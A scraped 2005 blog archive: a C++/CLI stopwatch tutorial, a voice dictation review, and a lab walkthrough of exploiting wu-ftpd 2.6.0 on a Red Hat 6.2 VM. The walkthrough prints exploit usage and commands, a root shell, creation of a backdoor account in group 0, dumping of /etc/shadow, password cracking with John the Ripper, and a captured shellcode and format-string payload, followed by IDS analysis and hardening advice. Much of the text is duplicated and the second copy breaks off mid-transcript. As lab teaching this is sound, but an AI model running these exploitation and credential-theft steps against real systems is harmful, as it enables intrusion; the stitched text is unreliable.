private: System::TimeSpan total_duration;
The function for the button click is as follows:
private: System::Void button1_Click(System::Object^ sender, System::EventArgs^ e) {
System::DateTime currentTime;
//Set the end time, used actual instance of endTime rather than
//System::DataTime->Now. the reason I set this to an object
//rather than just setting the values on assignment below
//is to freeze the time so we do not have a shift in
//seconds at the time of this function completing.
currentTime = currentTime.Now;
endTime = currentTime;
//Add the number of hours, mins, and secs to the current time
//to get the itme when the stop watch should stop
endTime = endTime.AddHours(udHours->Value.ToDouble(udHours->Value));
endTime = endTime.AddMinutes(udMins->Value.ToDouble(udMins->Value));
endTime = endTime.AddSeconds(udSec->Value.ToDouble(udSec->Value));
//set ticks to complete to the value of the timer duration
total_duration = (endTime - currentTime);
//Set the indicator text under the progress pane to the duration value.
txtCountDown->Text = total_duration.ToString();
//enable the timer
timer1->Enabled = true;
Next, I use the following method for the timers onTick event.
private: System::Void timer1_Tick(System::Object^ sender, System::EventArgs^ e)
System::Int32 amount_to_increment;
//If time is up, stop the timer and show the message box, otherwise
//continue updating the progress bars
if (System::DateTime::Now >= endTime)
timer1->Enabled = false;
System::Windows::Forms::MessageBox::Show("Times up", "Timer is up", System::Windows::Forms::MessageBoxButtons::OK );
//Update the progress text box with the total duration time minus
//the current system time
txtCountDown->Text = (endTime - System::DateTime::Now).ToString();
//set the total percentage of the progress bar to be
// total_duration minus the current duration from the end. Divide
//that result by the total duration and multiply the end result
//by 100 to give use the percentage. Once we have that
//figured, assign the overall value of the progress bar to that percent
amount_to_increment = (
(total_duration -
(endTime - System::DateTime::Now)
) * 100;
progressBar->Value = amount_to_increment;
And the final method is the Stop button. Below is the code for the Stop button.
private: System::Void cmdStop_Click(System::Object^ sender, System::EventArgs^ e) {
//stop the timer, do not reset any values as this will be done
//on the next start button push
timer1->Enabled = false;
Below is a screenshot of the finished application.

Now my StopWatch is complete. There are a few things to note. In the Timer1 Tick method, I used a System::Int32 variable type instead of an int type. Both types will work interchangeably in this instance, however it seems that Microsoft prefers that types are referenced from the System namespace rather than using the intrinsic data types. I figured this out when I had some issues working with the double type. I also alternated between calling System::DateTime methods without an object instance and calling instantiated object functions.
For a free IDE, this is a very impressive offering. Visual Studio .Net has come a long way since the initial release in 2002. The Visual Designer is incredibly easy to work with, there is very decent debugging capabilities, such as being able to move the mouse over and getting a tree view of objects without needing to use the watch window. That is not to say I don’t have my gripes about it as well. For one, the code that it produces is ugly as hell. Its not as standards compliant than GCC, but I think a lot of that is because I have grown used to working with GCC so much. Also, when working with the Visual Designer, double-clicking on a component to bring up its default method creates the code in the header file, not in a separate implementation file. That is a little annoying. There is also a little too much of the form code and various other default .Net code visible by default. You can collapse those, but it’s still a bit of an eye sore. Overall, I do like this, and I am hoping that they release the SDK for Windows Mobile to this version of Visual Studio.
Thursday, November 17, 2005
Voice Dictation Opinion
With the recent writing of this blog, I have begun to look for easier ways to write articles. It occurred to me that one of the possible technologies out there is voice dictation. It has been a number of years since the last time I looked at voice dictation software and my previously experiences with the quality of the software was not very good. However that was many years ago, so I have decided to reinvest some time to look into the current crop of voice dictation software, and after some research I settled on Dragon NaturallySpeaking Preferred Edition. I will briefly describe my experience getting started.
Just like in previous experiences, the first step post-installation to train the software to recognize your voice. To train the software, NS has a section called the Accuracy Center that has you read a series of passages into a microphone. As luck would have, as it did last time I tried voice software out, I managed to get cold as I was getting started. Some on the passages were fairly interesting. For example, one of the passages was John F. Kennedy's inaugural address. Some of the other passages were a pretty funny story from Dave Barry, various email messages and mock sales literature, and Dogbert’s Principles of Management. The Dave Barry passage actually had me laughing at some points, which added itself to the difficulty. Despite having a cold and snickering at some of the funnier passages, Dragon NaturallySpeaking still recognized the words fairly with a good degree of accuracy.
After training, the software needs to adapt the data files to a user profile. Hardware does appear to be a factor since I continually ran out of virtual memory during the adaptation. However it did seem like the software did adapt what it could process, so I had to repeat the process a few times, leading me to believe patience is definitely a requirement.
Over the course of several weeks I continued to train with the software. The more training I did the more accuracy improved. After a week or so I began working with dictating documents (in fact you are reading one of them right now). There are times when you have to talk a little slower in order for the engine to recognize words correctly, but that is a minor inconvenience when compared to the amount of time that you save by using your voice as input. Besides, I like to read and revise my wording quite a bit anyhow. It does have the occasional misinterpretation of words, however the software does provide a correction option. By highlighting the misinterpreted words, you can right-mouse click and choose a similar word from a list, and the software will take note and add to the user profile.
While we're still a few years away from using voice one, such as in Star Trek, it is possible to effectively communicate with a computer using your voice. Having a keyboard and mouse handy are still required tools unfortunately. Despite this, I do believe that voice dictation has actually made quite a bit of progress. The question is if it is just a novelty or can someone work and be productive with it has been answered by a few weeks of work with the software, to which I would answer it can be a productive tool. I would be curious to see what kinds of issues come up with people who have speech impediments. Hopefully within the next 10 years if the technology continues to progress in the manner that it has been we will start to see PCs readily equipped with voice dictation as an option. Currently Office 2003 has an add-on package, so perhaps this will be a growing trend. I believe that voice dictation will be a major benefit both for regular users and users with physical disabilities.
Just like in previous experiences, the first step post-installation to train the software to recognize your voice. To train the software, NS has a section called the Accuracy Center that has you read a series of passages into a microphone. As luck would have, as it did last time I tried voice software out, I managed to get cold as I was getting started. Some on the passages were fairly interesting. For example, one of the passages was John F. Kennedy's inaugural address. Some of the other passages were a pretty funny story from Dave Barry, various email messages and mock sales literature, and Dogbert’s Principles of Management. The Dave Barry passage actually had me laughing at some points, which added itself to the difficulty. Despite having a cold and snickering at some of the funnier passages, Dragon NaturallySpeaking still recognized the words fairly with a good degree of accuracy.
After training, the software needs to adapt the data files to a user profile. Hardware does appear to be a factor since I continually ran out of virtual memory during the adaptation. However it did seem like the software did adapt what it could process, so I had to repeat the process a few times, leading me to believe patience is definitely a requirement.
Over the course of several weeks I continued to train with the software. The more training I did the more accuracy improved. After a week or so I began working with dictating documents (in fact you are reading one of them right now). There are times when you have to talk a little slower in order for the engine to recognize words correctly, but that is a minor inconvenience when compared to the amount of time that you save by using your voice as input. Besides, I like to read and revise my wording quite a bit anyhow. It does have the occasional misinterpretation of words, however the software does provide a correction option. By highlighting the misinterpreted words, you can right-mouse click and choose a similar word from a list, and the software will take note and add to the user profile.
While we're still a few years away from using voice one, such as in Star Trek, it is possible to effectively communicate with a computer using your voice. Having a keyboard and mouse handy are still required tools unfortunately. Despite this, I do believe that voice dictation has actually made quite a bit of progress. The question is if it is just a novelty or can someone work and be productive with it has been answered by a few weeks of work with the software, to which I would answer it can be a productive tool. I would be curious to see what kinds of issues come up with people who have speech impediments. Hopefully within the next 10 years if the technology continues to progress in the manner that it has been we will start to see PCs readily equipped with voice dictation as an option. Currently Office 2003 has an add-on package, so perhaps this will be a growing trend. I believe that voice dictation will be a major benefit both for regular users and users with physical disabilities.
Sunday, November 13, 2005
Scenario of the infiltration of a Red Hat 6.2 System, Part 2
Previously we scanned a network and discovered the active system, did a full port scan against the system to find listening services using Nmap. We also used Netcat and Telnet to view banners in order to discover service versions and architecture and did a search of a vulnerability database to find an exploit for the FTP service. One thing to note before we begin, since this article was written a few days after the initial scan, the IP setup changed in my VMWare environment. This has to do with the way I configured my guest machines to share IP addresses. So our victim IP address is now at
I have compiled and exploit called Wu-FTPD-God to use against the victim system. I run the help command for this exploit, below is the screen that I see:
Usage: exploit -t <target> [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]
[-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]
target : host with any wuftpd
user : anonymous user
dir : if not anonymous user, you need to have writable directory
magic_str : magic string (see exploit description)
-g : enables magic string digging
-x : enables test mode
pass_addr : pointer to setproctitle argument
ret_addr : this is pointer to shellcode
0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm
2 - SuSe 6.3 with wuftpd 2.6.0(1) from rpm
3 - SuSe 6.4 with wuftpd 2.6.0(1) from rpm
4 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)
5 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports
* 6 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages
7 - FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports
8 - FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages
From the above output, I can see that I will run the following command.
exploit -s 0 -t
This will launch the FTP exploit against our vulnerable system. I launch the exploit to see what happens:
C:\HACKTO~1\WU-FTP~1>exploit -s 0 -t
Target: (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS <shellcode>
230-Next time please use your e-mail address as your password
230- for example: joe@
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
Linux vm-redhat62 2.2.14-5.0smp #1 SMP Tue Mar 7 21:01:40 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
I can see the exploit figure out its internal variables, it launches the attack, and it returns its user id to me. I am in the system as root. Below is what I do next:
which adduser
which: no adduser in (/usr/local/bin:/bin:/usr/bin)
export PATH=$PATH:/usr/sbin
which adduser
/usr/sbin/adduseradduser wonka -G 0
cat /etc/passwd
ftp:x:14:50:FTP User:/home/ftp:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
jward:x:500:500:John Ward:/home/jward:/bin/bash
passwd wonka
New UNIX password: candy
BAD PASSWORD: it is too short
Retype new UNIX password: candy
Changing password for user wonka
passwd: all authentication tokens updated successfully
cat /etc/shadow
So what did I do here? First thing is to check for the presence of the adduser command. When I see that adduser is not in my path I add it to the path, and create a user named Wonka to group 0. I then dump the contents of the /etc/passwd file to see if my user was created correctly. Once I see that the account is there, I change the password of Wonka to “candy”. I then dump the contents of the /etc/shadow file to see that the password token is in place. I copy the contents of the passwd and shadow file to crack offline using a screen capture. This will give me more to work with now that I have a foothold in the system, and hopefully crack the root password offline. I immediately exit the system once I have the passwd files. This will minimize my exposure on the system in the event that an IDS system is logging everything, which makes forensics recovery difficult if I split out my sessions. But for this demonstration, I will not connect to this system again since my foot is already in the door.
The last step here is to crack the password file. To crack the password file, I first need to unshadow them. I will use Unshadow, a utility that comes with John the Ripper. I prefer John the Ripper since it has been a tool that has been around for a very long time, is fairly fast, and I am familiar with it. There are a number of tools with different features that could be used here, so pick your poison. Below is the Unshadow utility at work:
C:\HACKTO~1\JOHN-16\RUN>unshadow passwd.txt shadow.txt
ftp:*:14:50:FTP User:/home/ftp:
xfs:!!:43:43:X Font Server:/etc/X11/fs:/bin/false
postgres:!!:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
jward: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:500:500:John Ward:/home/jward:/bin/bash
beavis: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:501:501::/home/beavis:/bin/bash
butthead: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:502:502::/home/butthead:/bin/bash
wonka: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.:503:503::/home/wonka:/bin/bash
By default the utility outputs to the Standard Output device, so I will need to redirect the output. I output the results to a file called passwd. I am now ready to crack my passwd file using John the Ripper. Below is the transcript of that session:
C:\HACKTO~1\JOHN-16\RUN>john passwd
Loaded 5 passwords with 5 different salts (FreeBSD MD5 [32/32])
beavis (butthead)
candy (wonka)
rest removed for brevity.
Once the session is done, I can run “john –show <passwd file>” in order to show all cracked passwords. For more reference on John the Rippers command line switches, consult the help file.
One of the passwords I have retrieved is the root password. With the root password I can do quite a bit to the system at this point. I can log in to the system remotely using my newly created Wonka account and su to root.
That completes the actual exploitation of the system. There is a lot more I could do, such as rootkit the system and clear my logs to cover my tracks, create other user accounts, set up IRC bots or host warez. But I would like to look at this attack from an analysts standpoint. I left a Snort sensor running on my virtual network to record this. If we look at the Sguil Window, we will see the alerts that were kicked off during the attack (Sorry for the old version of Sguil, it was the only version I had handy at the moment).

Here is the portscan alert highlighted. I can see where the attacking system executed the port scan with only the Syn flag highlighted here. It also scanned the system using random ports. A more savvy intruder would have spaced out the scan over a longer period of time to evade the Snort portscan detection engine. Patience is a virtue that if an attacker allows can truly make the scanning more difficult to detect. If the intruder spaces out the scanning effort over the course of several minutes, hours, or even days by incrementing the time between actual attempts, then an IDS system will most likely not detect the attempt. In this case, time is working against the defenders and in the favor of the attacker. However, in this day and age, scans occur reguarly on the Internet and most will ignore the occasional port scan.
(image placeholder)
Next, I can see the password overflow attempt. I highlight the first FTP Pass Overflow attempt. In the preview Window I can see the large amount of 90’s in the window, which are NOPs, or x86 instructions that are used to pad operations for when the the actual overflow occurs. I will pull a transcript of this session. (The other alerts titled “FTP Site overflow attempt” and “ATTACK-RESPONSE id check returned root” are part of the same event). Below is the full transcript of the associated event:
Sensor Name: localhost
Timestamp: 2005-07-08 17:25:56
Connection ID: .localhost_90
Src IP: (Unknown)
Dst IP: (Unknown)
Src Port: 1035
Dst Port: 21
DST: 220 vm-redhat62 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
DST: 331 Guest login ok, send your complete e-mail address as password.
SRC: PASS ...........................................................................................................................................................................................................................................................................................................................................................1.1.1..F..1.1.C..A.?...k^1.1..^..F.f.....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0...F.1..F..v..F....N..V.....1.1.............0bin0sh1..11
DST: 230-The response '...........................................................................................................................................................................................................................................................................................................................................................1.1.1..F..1.1.C..A.?...k^1.1..^..F.f....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0...F.1..F..v..F....N..V.....1.1..........0bin0sh1..11' is not valid
DST: 230-Next time please use your e-mail address as your password
DST: 230- for example: joe@
DST: 230 Guest login ok, access restrictions apply.
SRC: site exec xx(....%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f%p
DST: 200-xx(...-2-2000-2000000000000000000000000000000000nan00000000-200000000000000000000000000000000000000000000000000000000000000000000000000-2-240nan0346-200///2044297851017083878449989065045702790772352387303630021320085862758321695791907886081279538584938881196001965231594583934580243147475741237938254932277442003685657984854959659910013720327053910222892609388760118425667440558620855798543753887373643528757138981327804794142720xbfffb028
DST: 200 (end of 'xx(...%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f%p')
SRC: site exec xx(....%d%.134699076d.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f%n
SRC: /bin/uname -a;/usr/bin/id;
DST: Linux vm-redhat62 2.2.14-5.0smp #1 SMP Tue Mar 7 21:01:40 EST 2000 i686 unknown
DST: uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
SRC: w
DST: 10:25am up 15 min, 0 users, load average: 0.04, 0.05, 0.06
SRC: export PATH=$PATH:/usr/sbin
SRC: adduser wonka -G 0
SRC: cat /etc/passwd
DST: root:x:0:0:root:/root:/bin/bash
DST: bin:x:1:1:bin:/bin:
DST: daemon:x:2:2:daemon:/sbin:
DST: adm:x:3:4:adm:/var/adm:
DST: lp:x:4:7:lp:/var/spool/lpd:
DST: sync:x:5:0:sync:/sbin:/bin/sync
DST: shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
DST: halt:x:7:0:halt:/sbin:/sbin/halt
DST: mail:x:8:12:mail:/var/spool/mail:
DST: news:x:9:13:news:/var/spool/news:
DST: uucp:x:10:14:uucp:/var/spool/uucp:
DST: operator:x:11:0:operator:/root:
DST: games:x:12:100:games:/usr/games:
DST: gopher:x:13:30:gopher:/usr/lib/gopher-data:
DST: ftp:x:14:50:FTP User:/home/ftp:
DST: nobody:x:99:99:Nobody:/:
DST: xf
DST: s:x:43:43:X Font Server:/etc/X11/fs:/bin/false
DST: named:x:25:25:Named:/var/named:/bin/false
DST: postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
DST: jward:x:500:500:John Ward:/home/jward:/bin/bash
DST: beavis:x:501:501::/home/beavis:/bin/bash
DST: butthead:x:502:502::/home/butthead:/bin/bash
DST: wonka:x:503:503::/home/wonka:/bin/bash
SRC: passwd wonka
DST: New UNIX password:
SRC: candy
DST: BAD PASSWORD: it is too short
DST: Retype new UNIX password:
SRC: candy
DST: Changing password for user wonka
DST: passwd: all authentication tokens updated successfully
SRC: cat /etc/shadow
DST: root:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/:12939:0:99999:7:-1:-1:134540356
DST: bin:*:12939:0:99999:7:::
DST: daemon:*:12939:0:99999:7:::
DST: adm:*:12939:0:99999:7:::
DST: lp:*:12939:0:99999:7:::
DST: sync:*:12939:0:99999:7:::
DST: shutdown:*:12939:0:99999:7:::
DST: halt:*:12939:0:99999:7:::
DST: mail:*:12939:0:99999:7:::
DST: news:*:12939:0:99999:7:::
DST: uucp:*:12939:0:99999:7:::
DST: operator:*:12939:0:99999:7:::
DST: games:*:12939:0:99999:7:::
DST: gopher:*:12939:0:99999:7:::
DST: ftp:*:12939:0:99999:7:::
DST: nobody:*:12939:0:99999:7:::
DST: xfs:!!:12939:0:99999:7:::
DST: named:!!:12939
DST: :0:99999:7:::
DST: postgres:!!:12939:0:99999:7:::
DST: jward: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:12939:0:99999:7:-1:-1:134540356
DST: beavis: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:13033:0:99999:7:-1:-1:134540332
DST: butthead: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:0:99999:7:-1:-1:134540332
DST: wonka: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:13048:0:99999:7:-1:-1:134539228
SRC: exit
By looking at the above transcript, we can see where the attacked puts the overflow code into memory and exploits the vunerability in WU-FTP. Notice in the data passed to the password prompt the encoded execution of /bin/sh. Once exploited, the script checks its uid to confirm that it is root. The remaining commands simply creates accounts, confirms the account it created and logs off to minimize being exposed for a large period of time. It also reduces the amount of information in this transcript. A clever attacker would reconnect using an encrypted protocol such as SSH to prevent sniffers such as Snort from seeing what further actions the attacker will use.
In the above scenario, we can look at things that would have minimized the impact of being exploited. Ignoring the obvious such as running behind a firewall, first is to shut off unnecessary services. If the above was simple a web server, there would be no reason for the additional services such as NFS and FTP to be running. Unnecessary services can provide detailed information about a server and it arcitecture, and in server cases, have vunerabilites that can be exploited by attackers. Second would be to be aware of any vunerabilities for your environment. Scanning vunerability databases can provide an security practitioner with lots of information, such as the frequency that past vunerabilities have appeared for your architecture. Third is keeping an eye on the servers that are exposed to the Internet. Even if you are running one service, and its behind a firewall, monitoring traffic to and from is invaluable in incident response. Never assume that a box is fully secure. As Richard Bejtlich constantly says, there are always people out there smarter than you, no matter how good you are. This is why prevention will eventually fail. But don’t abondon your prevention strategy. Having an IDS in conjunction with various access controls and IPS solutions is a step towards being proactive in your incident reponse strategy.
I have compiled and exploit called Wu-FTPD-God to use against the victim system. I run the help command for this exploit, below is the screen that I see:
Usage: exploit -t <target> [-l user/pass] [-s systype] [-o offset] [-g] [-h] [-x]
[-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]
target : host with any wuftpd
user : anonymous user
dir : if not anonymous user, you need to have writable directory
magic_str : magic string (see exploit description)
-g : enables magic string digging
-x : enables test mode
pass_addr : pointer to setproctitle argument
ret_addr : this is pointer to shellcode
0 - RedHat 6.2 (?) with wuftpd 2.6.0(1) from rpm
1 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm
2 - SuSe 6.3 with wuftpd 2.6.0(1) from rpm
3 - SuSe 6.4 with wuftpd 2.6.0(1) from rpm
4 - RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm (test)
5 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from ports
* 6 - FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from packages
7 - FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from ports
8 - FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from packages
From the above output, I can see that I will run the following command.
exploit -s 0 -t
This will launch the FTP exploit against our vulnerable system. I launch the exploit to see what happens:
C:\HACKTO~1\WU-FTP~1>exploit -s 0 -t
Target: (ftp/<shellcode>): RedHat 6.2 (?) with wuftpd 2.6.0(1) from
Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode: 152
loggin into system..
USER ftp
331 Guest login ok, send your complete e-mail address as password.
PASS <shellcode>
230-Next time please use your e-mail address as your password
230- for example: joe@
230 Guest login ok, access restrictions apply.
STEP 2 : Skipping, magic number already exists: [87,01:03,02:01,01:02,04]
STEP 3 : Checking if we can reach our return address by format string
STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me now)
STEP 5 : Sending code.. this will take about 10 seconds.
Press ^\ to leave shell
Linux vm-redhat62 2.2.14-5.0smp #1 SMP Tue Mar 7 21:01:40 EST 2000 i686 unknown
uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
I can see the exploit figure out its internal variables, it launches the attack, and it returns its user id to me. I am in the system as root. Below is what I do next:
which adduser
which: no adduser in (/usr/local/bin:/bin:/usr/bin)
export PATH=$PATH:/usr/sbin
which adduser
/usr/sbin/adduseradduser wonka -G 0
cat /etc/passwd
ftp:x:14:50:FTP User:/home/ftp:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
jward:x:500:500:John Ward:/home/jward:/bin/bash
passwd wonka
New UNIX password: candy
BAD PASSWORD: it is too short
Retype new UNIX password: candy
Changing password for user wonka
passwd: all authentication tokens updated successfully
cat /etc/shadow
So what did I do here? First thing is to check for the presence of the adduser command. When I see that adduser is not in my path I add it to the path, and create a user named Wonka to group 0. I then dump the contents of the /etc/passwd file to see if my user was created correctly. Once I see that the account is there, I change the password of Wonka to “candy”. I then dump the contents of the /etc/shadow file to see that the password token is in place. I copy the contents of the passwd and shadow file to crack offline using a screen capture. This will give me more to work with now that I have a foothold in the system, and hopefully crack the root password offline. I immediately exit the system once I have the passwd files. This will minimize my exposure on the system in the event that an IDS system is logging everything, which makes forensics recovery difficult if I split out my sessions. But for this demonstration, I will not connect to this system again since my foot is already in the door.
The last step here is to crack the password file. To crack the password file, I first need to unshadow them. I will use Unshadow, a utility that comes with John the Ripper. I prefer John the Ripper since it has been a tool that has been around for a very long time, is fairly fast, and I am familiar with it. There are a number of tools with different features that could be used here, so pick your poison. Below is the Unshadow utility at work:
C:\HACKTO~1\JOHN-16\RUN>unshadow passwd.txt shadow.txt
ftp:*:14:50:FTP User:/home/ftp:
xfs:!!:43:43:X Font Server:/etc/X11/fs:/bin/false
postgres:!!:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
jward: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:500:500:John Ward:/home/jward:/bin/bash
beavis: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:501:501::/home/beavis:/bin/bash
butthead: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:502:502::/home/butthead:/bin/bash
wonka: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX.:503:503::/home/wonka:/bin/bash
By default the utility outputs to the Standard Output device, so I will need to redirect the output. I output the results to a file called passwd. I am now ready to crack my passwd file using John the Ripper. Below is the transcript of that session:
C:\HACKTO~1\JOHN-16\RUN>john passwd
Loaded 5 passwords with 5 different salts (FreeBSD MD5 [32/32])
beavis (butthead)
candy (wonka)
rest removed for brevity.
Once the session is done, I can run “john –show <passwd file>” in order to show all cracked passwords. For more reference on John the Rippers command line switches, consult the help file.
One of the passwords I have retrieved is the root password. With the root password I can do quite a bit to the system at this point. I can log in to the system remotely using my newly created Wonka account and su to root.
That completes the actual exploitation of the system. There is a lot more I could do, such as rootkit the system and clear my logs to cover my tracks, create other user accounts, set up IRC bots or host warez. But I would like to look at this attack from an analysts standpoint. I left a Snort sensor running on my virtual network to record this. If we look at the Sguil Window, we will see the alerts that were kicked off during the attack (Sorry for the old version of Sguil, it was the only version I had handy at the moment).

Here is the portscan alert highlighted. I can see where the attacking system executed the port scan with only the Syn flag highlighted here. It also scanned the system using random ports. A more savvy intruder would have spaced out the scan over a longer period of time to evade the Snort portscan detection engine. Patience is a virtue that if an attacker allows can truly make the scanning more difficult to detect. If the intruder spaces out the scanning effort over the course of several minutes, hours, or even days by incrementing the time between actual attempts, then an IDS system will most likely not detect the attempt. In this case, time is working against the defenders and in the favor of the attacker. However, in this day and age, scans occur reguarly on the Internet and most will ignore the occasional port scan.
(image placeholder)
Next, I can see the password overflow attempt. I highlight the first FTP Pass Overflow attempt. In the preview Window I can see the large amount of 90’s in the window, which are NOPs, or x86 instructions that are used to pad operations for when the the actual overflow occurs. I will pull a transcript of this session. (The other alerts titled “FTP Site overflow attempt” and “ATTACK-RESPONSE id check returned root” are part of the same event). Below is the full transcript of the associated event:
Sensor Name: localhost
Timestamp: 2005-07-08 17:25:56
Connection ID: .localhost_90
Src IP: (Unknown)
Dst IP: (Unknown)
Src Port: 1035
Dst Port: 21
DST: 220 vm-redhat62 FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) ready.
DST: 331 Guest login ok, send your complete e-mail address as password.
SRC: PASS ...........................................................................................................................................................................................................................................................................................................................................................1.1.1..F..1.1.C..A.?...k^1.1..^..F.f.....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0...F.1..F..v..F....N..V.....1.1.............0bin0sh1..11
DST: 230-The response '...........................................................................................................................................................................................................................................................................................................................................................1.1.1..F..1.1.C..A.?...k^1.1..^..F.f....'..1..^..=..1.1..^..C.1...1..^.......u.1..F..^..=.....0...F.1..F..v..F....N..V.....1.1..........0bin0sh1..11' is not valid
DST: 230-Next time please use your e-mail address as your password
DST: 230- for example: joe@
DST: 230 Guest login ok, access restrictions apply.
SRC: site exec xx(....%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f%p
DST: 200-xx(...-2-2000-2000000000000000000000000000000000nan00000000-200000000000000000000000000000000000000000000000000000000000000000000000000-2-240nan0346-200///2044297851017083878449989065045702790772352387303630021320085862758321695791907886081279538584938881196001965231594583934580243147475741237938254932277442003685657984854959659910013720327053910222892609388760118425667440558620855798543753887373643528757138981327804794142720xbfffb028
